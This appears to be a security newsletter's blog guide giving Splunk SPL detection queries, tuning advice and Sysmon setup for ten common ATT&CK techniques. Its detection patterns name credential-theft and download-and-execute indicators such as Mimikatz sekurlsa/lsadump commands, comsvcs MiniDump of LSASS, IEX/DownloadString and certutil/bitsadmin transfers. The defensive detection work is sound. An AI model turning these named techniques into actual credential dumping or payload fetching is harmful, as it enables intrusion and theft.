Splunk SPL Detection Queries for the 10 ATT&CK Techniques You Actually See
MITRE ATT&CK has 200+ techniques. You do not need detections for all of them. Red Canary's 2025 Threat Detection Report found that 10 techniques account for 80% of observed adversary behavior across enterprise incident investigations.
This guide gives you the Splunk SPL query for each of those 10 techniques: what data source you need enabled, the query itself, what a real detection looks like, and how to tune it so you are not drowning in false positives on day one.
All queries assume Windows Event Log and Sysmon data in Splunk. The Sysmon configuration that produces the required events is noted for each query. If you are not running Sysmon, the SwiftOnSecurity Sysmon config is the recommended starting point.
T1059: Command and Scripting Interpreter (PowerShell, cmd, WMI)
The most observed technique every year. Attackers use built-in interpreters to avoid dropping files and to blend in with legitimate administration.
Data sources needed: Sysmon Event ID 1 (Process Create), Windows Event ID 4104 (PowerShell Script Block Logging)
Query 1: Encoded PowerShell commands (common for obfuscation)
index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=1
| where like(CommandLine, "%-enc%") OR like(CommandLine, "%-EncodedCommand%") OR like(CommandLine, "%-ec %")
| where like(ParentImage, "%winword%") OR like(ParentImage, "%excel%") OR like(ParentImage, "%outlook%") OR like(ParentImage, "%iexplore%") OR like(ParentImage, "%chrome%") OR like(ParentImage, "%firefox%")
| table _time, ComputerName, User, ParentImage, CommandLine, Image
| sort -_time
Why the parent process filter: encoded PowerShell from Office apps or browsers is nearly always malicious. Encoded PowerShell from SCCM, Ansible, or other management tools is common and legitimate.
Query 2: PowerShell downloading and executing content
index=windows source="XmlWinEventLog:Microsoft-Windows-PowerShell/Operational"
EventCode=4104
| where like(Message, "%DownloadString%") OR like(Message, "%DownloadFile%") OR like(Message, "%IEX%") OR like(Message, "%Invoke-Expression%") OR like(Message, "%WebClient%")
| table _time, Computer, Message
| sort -_time
False positives: Software deployment scripts, SCCM/Intune policies, developer tooling. Tune by building an allowlist of known-good parent processes and script paths.
Tuning tip: Start with the parent process filter (ParentImage from Office/browser apps) before enabling the encoded command detection broadly. This reduces false positives by 90% in most environments.
T1003: OS Credential Dumping (LSASS Access, Mimikatz)
Credential dumping from LSASS is the prerequisite for pass-the-hash and pass-the-ticket attacks. Mimikatz is the most common tool; comsvcs.dll is the most common living-off-the-land technique.
Data sources needed: Sysmon Event ID 10 (Process Access)
Query 1: Suspicious LSASS memory access
index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=10
TargetImage="*lsass.exe"
| where (GrantedAccess="0x1010" OR GrantedAccess="0x1410" OR GrantedAccess="0x1fffff" OR GrantedAccess="0x1f1fff")
| where NOT (SourceImage="*MsMpEng.exe" OR SourceImage="*svchost.exe" OR SourceImage="*taskmgr.exe" OR SourceImage="*csrss.exe" OR SourceImage="*wininit.exe" OR SourceImage="*wmiprvse.exe")
| table _time, ComputerName, SourceImage, TargetImage, GrantedAccess, SourceUser
| sort -_time
Access masks explained: 0x1010 and 0x1410 are the minimum required for credential dumping via OpenProcess + ReadProcessMemory. 0x1fffff is full access, nearly always malicious.
Query 2: comsvcs.dll MiniDump technique (lolbas credential dumping)
index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=1
| where like(CommandLine, "%comsvcs%") AND like(CommandLine, "%MiniDump%")
| table _time, ComputerName, User, CommandLine, ParentImage
| sort -_time
Query 3: Mimikatz keyword detection in script block logging
index=windows source="XmlWinEventLog:Microsoft-Windows-PowerShell/Operational"
EventCode=4104
| where like(Message, "%sekurlsa%") OR like(Message, "%logonpasswords%") OR like(Message, "%lsadump%") OR like(Message, "%kerberos::ptt%") OR like(Message, "%privilege::debug%")
| table _time, Computer, Message
| sort -_time
False positives: Endpoint security software, IT monitoring tools that enumerate processes. The parent process exclusions in Query 1 handle most cases. Any alert on comsvcs MiniDump is nearly always malicious and should be treated as high priority.
Briefings like this, every morning before 9am.
Threat intel, active CVEs, and campaign alerts, distilled for practitioners. 50,000+ subscribers. No noise.
T1078: Valid Accounts (Credential Misuse Detection)
Attackers using valid stolen credentials is the hardest technique to detect because the activity looks legitimate by design. Behavioral analytics detect deviations from normal patterns.
Data sources needed: Windows Event ID 4624 (Logon), 4625 (Failed Logon), 4648 (Explicit Credential Logon)
Query 1: Logons from unexpected geographic locations (impossible travel)
index=windows EventCode=4624 Logon_Type=3
| iplocation Source_Network_Address
| stats values(Country) as countries, values(Source_Network_Address) as IPs, count by Account_Name, _time span=1h
| where mvcount(countries) > 1
| table _time, Account_Name, countries, IPs, count
Query 2: Spray attack detection (same password tried on many accounts)
index=windows EventCode=4625
| bin _time span=5m
| stats dc(Account_Name) as unique_accounts, count by Source_Network_Address, _time
| where unique_accounts > 20
| table _time, Source_Network_Address, unique_accounts, count
| sort -unique_accounts
Query 3: First-time logon from a workstation (lateral movement indicator)
index=windows EventCode=4624 Logon_Type=3
| stats earliest(_time) as first_seen, count by Account_Name, ComputerName
| where first_seen > relative_time(now(), "-24h@h")
| eval first_seen=strftime(first_seen, "%Y-%m-%d %H:%M:%S")
| table first_seen, Account_Name, ComputerName, count
| sort -count
False positives: Users traveling, VPN endpoint changes, scheduled tasks. The impossible travel query requires iplocation which needs proper GeoIP database setup. Build a home-base lookup table for accounts with known valid remote access.
T1021: Remote Services (PsExec, WMI, RDP Lateral Movement)
Lateral movement via built-in remote services is how attackers move through an environment after initial access. PsExec, WMI, and RDP are the three most common vectors.
Data sources needed: Sysmon Event ID 1, Windows Event ID 4688, 4624, 7045
Query 1: PsExec execution detection
index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=1
| where (like(Image, "%psexec%") OR like(Image, "%PSEXESVC%")) OR (like(CommandLine, "%-s %") AND like(CommandLine, "%-i %") AND like(ParentImage, "%services.exe%"))
| table _time, ComputerName, User, Image, CommandLine, ParentImage
| sort -_time
Query 2: Suspicious service installation via SCM (PsExec signature)
index=windows EventCode=7045
| where like(ServiceFileName, "%\\Windows\\Temp%") OR like(ServiceFileName, "%\\Users\\Public%") OR like(ServiceFileName, "%\\AppData\\Local\\Temp%")
| table _time, ComputerName, ServiceName, ServiceFileName, ServiceType
| sort -_time
Legitimate services are not installed from temp directories. This query has near-zero false positives in most environments.
Query 3: WMI remote execution
index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=1
ParentImage="*WmiPrvSE.exe"
| where NOT (Image="*svchost.exe" OR Image="*WmiPrvSE.exe")
| table _time, ComputerName, User, ParentImage, Image, CommandLine
| sort -_time
False positives for WMI query: Management tools (SCCM, Tanium, monitoring agents) use WMI extensively. Build an allowlist of known management server source IPs and filter them out.
T1543: Create or Modify System Process (Persistence via Services)
Attackers create Windows services or scheduled tasks to maintain persistence across reboots. New services in unusual locations are nearly always malicious.
Data sources needed: Windows Event ID 7045 (Service Installed), 4698 (Scheduled Task Created), Sysmon Event ID 1
Query 1: New service created from unusual path
index=windows EventCode=7045
| where NOT (like(ServiceFileName, "%\\Windows\\System32%") OR like(ServiceFileName, "%\\Windows\\SysWow64%") OR like(ServiceFileName, "%\\Program Files%") OR like(ServiceFileName, "%\\Program Files (x86)%"))
| table _time, ComputerName, ServiceName, ServiceFileName, ServiceStartType
| sort -_time
Query 2: Scheduled task created by unexpected process
index=windows EventCode=4698
| eval TaskContent=Message
| where NOT (like(TaskContent, "%\\Windows\\System32%") OR like(TaskContent, "%\\Program Files%"))
| table _time, ComputerName, SubjectUserName, TaskName, TaskContent
| sort -_time
Query 3: Registry run key modification (startup persistence)
index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=13
| where (like(TargetObject, "%Run\\%") OR like(TargetObject, "%RunOnce\\%"))
AND (like(TargetObject, "%HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion%") OR like(TargetObject, "%HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion%"))
| where NOT (Image="*svchost.exe" OR Image="*MsMpEng.exe")
| table _time, ComputerName, User, Image, TargetObject, Details
| sort -_time
False positives: Software installers add services and run keys. Filter by known installer processes (msiexec.exe, setup.exe from program files paths) and by time of day (software deployments happen during business hours or maintenance windows).
T1055, T1105, T1204: Process Injection, Ingress Tool Transfer, User Execution
T1055: Process Injection -- Suspicious CreateRemoteThread
index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=8
| where NOT (SourceImage=TargetImage)
| where NOT (like(SourceImage, "%svchost.exe") OR like(SourceImage, "%MsMpEng.exe") OR like(SourceImage, "%csrss.exe"))
| where like(TargetImage, "%lsass.exe") OR like(TargetImage, "%winlogon.exe") OR like(TargetImage, "%explorer.exe") OR like(TargetImage, "%notepad.exe")
| table _time, ComputerName, SourceImage, TargetImage, NewThreadId
| sort -_time
T1105: Ingress Tool Transfer -- Downloads to suspicious locations
index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=11
| where (like(TargetFilename, "%\\Temp\\%.exe") OR like(TargetFilename, "%\\Temp\\%.ps1") OR like(TargetFilename, "%\\Temp\\%.bat") OR like(TargetFilename, "%\\Downloads\\%.exe"))
AND (like(Image, "%powershell%") OR like(Image, "%certutil%") OR like(Image, "%bitsadmin%") OR like(Image, "%curl.exe") OR like(Image, "%wget.exe"))
| table _time, ComputerName, User, Image, TargetFilename
| sort -_time
T1204: User Execution -- Office macro launching process
index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=1
| where (like(ParentImage, "%winword.exe") OR like(ParentImage, "%excel.exe") OR like(ParentImage, "%powerpnt.exe") OR like(ParentImage, "%outlook.exe"))
AND (like(Image, "%cmd.exe") OR like(Image, "%powershell.exe") OR like(Image, "%wscript.exe") OR like(Image, "%cscript.exe") OR like(Image, "%mshta.exe"))
| table _time, ComputerName, User, ParentImage, Image, CommandLine
| sort -_time
T1204 from Office has very low legitimate use. Any Office app spawning cmd or PowerShell is suspicious and should alert at high priority.
Enabling Sysmon and Tuning These Queries
Sysmon event IDs required for these queries:
| Event ID | Event type | Required for |
|---|---|---|
| 1 | Process Create | T1059, T1021, T1543, T1204 |
| 8 | CreateRemoteThread | T1055 |
| 10 | ProcessAccess | T1003 |
| 11 | FileCreate | T1105 |
| 13 | Registry value set | T1543 |
Minimum Sysmon configuration:
The SwiftOnSecurity Sysmon config (github.com/SwiftOnSecurity/sysmon-config) is the community standard starting point. Deploy it via Group Policy:
# Install Sysmon with config
Sysmon64.exe -accepteula -i sysmonconfig.xml
# Update config without restart
Sysmon64.exe -c sysmonconfig.xml
# Verify it is running
Get-Service Sysmon64
Alert volume management:
Do not enable all 10 detection queries simultaneously. Start with:
- T1003 LSASS access query (near-zero false positives, extremely high value)
- T1204 Office spawning shell (near-zero false positives in most environments)
- T1543 service from unusual path (near-zero false positives)
Get those three tuned and generating reliable alerts before adding the higher-volume queries (T1059 encoded PowerShell, T1078 logon analytics).
Building an allowlist workflow:
For each query, run it in a search mode for 7 days before enabling alerting. Export the results and categorize: legitimate software vs. suspicious. Add legitimate software to a lookup table and reference it in the query:
| lookup allowlisted_processes.csv Image OUTPUT allowed
| where isnull(allowed)
This pattern -- run for a week in observe mode, build the allowlist, then enable alerting -- reduces false positive rates by 80-90% compared to enabling alerts immediately.
The bottom line
Detection engineering is not about coverage breadth -- it is about depth and fidelity on the techniques that actually appear in your environment. These 10 techniques will account for the majority of real detections you fire in the next 12 months. Get these working, tuned, and generating reliable alerts before expanding to less common techniques. A SIEM that generates 50 reliable, actionable alerts per week is more valuable than one generating 500 alerts where 490 are noise.
Frequently asked questions
Do these queries work without Sysmon?
Partially. The queries using Windows Event IDs (4624, 4625, 4648, 4698, 7045) work with standard Windows event logging. The queries using Sysmon Event IDs (1, 8, 10, 11, 13) require Sysmon to be installed and configured. Sysmon provides significantly more detail than native Windows logging -- especially for process creation (CommandLine, ParentImage, Hashes) and process access (GrantedAccess, SourceImage). If you cannot deploy Sysmon org-wide, prioritize it on domain controllers, servers, and executive endpoints first.
What is the best free Sysmon configuration to start with?
The SwiftOnSecurity sysmon-config on GitHub is the community standard starting point. It provides comprehensive coverage without flooding your SIEM with excessive event volume. Olaf Hartong's sysmon-modular configuration is a more advanced option that provides a modular structure for tuning individual event categories. For most organizations, SwiftOnSecurity is the right starting point; sysmon-modular makes sense once you are ready to tune event volume per category.
How do I convert these Splunk queries to Microsoft Sentinel or Elastic?
Microsoft Sentinel uses KQL (Kusto Query Language); the logic is the same but the syntax differs. The Sigma community has converted many of these detection patterns to Sigma rules, which can be compiled to Splunk SPL, KQL, Elastic EQL, QRadar, and other SIEM syntaxes using sigma-cli. The SigmaHQ repository contains hundreds of detection rules for all these techniques in vendor-neutral Sigma format. For direct Sentinel equivalents, the Microsoft Sentinel GitHub repository contains KQL hunting queries for all MITRE ATT&CK techniques.
What is the difference between these detection queries and an EDR?
EDR agents (CrowdStrike, SentinelOne, Microsoft Defender) run these same behavioral detections on the endpoint itself in real time. SIEM-based detections are retrospective -- they fire based on log data that arrives minutes or hours after the event. The advantage of SIEM-based detection: centralized visibility across all endpoints in one query, ability to correlate events across multiple systems (e.g., T1078 impossible travel requires correlating logon events across all hosts), and no agent dependency. Run both where possible: EDR for real-time endpoint response, SIEM for cross-environment correlation and hunting.
How do I know if these queries would have detected a specific attack?
Use Atomic Red Team (github.com/redcanaryco/atomic-red-team) to simulate each ATT&CK technique in a test environment and verify your detections fire. Atomic Red Team provides ready-to-run test scripts for every technique. After running each atomic test, confirm the corresponding Splunk query returns results. This gives you empirical evidence of detection coverage rather than theoretical assessment. Run atomic tests quarterly after tuning changes to confirm coverage has not degraded.
Sources & references
Free resources
Critical CVE Reference Card 2025–2026
25 actively exploited vulnerabilities with CVSS scores, exploit status, and patch availability. Print it, pin it, share it with your SOC team.
Ransomware Incident Response Playbook
Step-by-step 24-hour IR checklist covering detection, containment, eradication, and recovery. Built for SOC teams, IR leads, and CISOs.
Get threat intel before your inbox does.
50,000+ security professionals read Decryption Digest for early warnings on zero-days, ransomware, and nation-state campaigns. Free, weekly, no spam.
Unsubscribe anytime. We never sell your data.
Founder & Cybersecurity Evangelist, Decryption Digest
Cybersecurity professional with expertise in threat intelligence, vulnerability research, and enterprise security. Covers zero-days, ransomware, and nation-state operations for 50,000+ security professionals weekly.
The Mythos Brief is free.
AI that finds 27-year-old zero-days. What it means for your security program.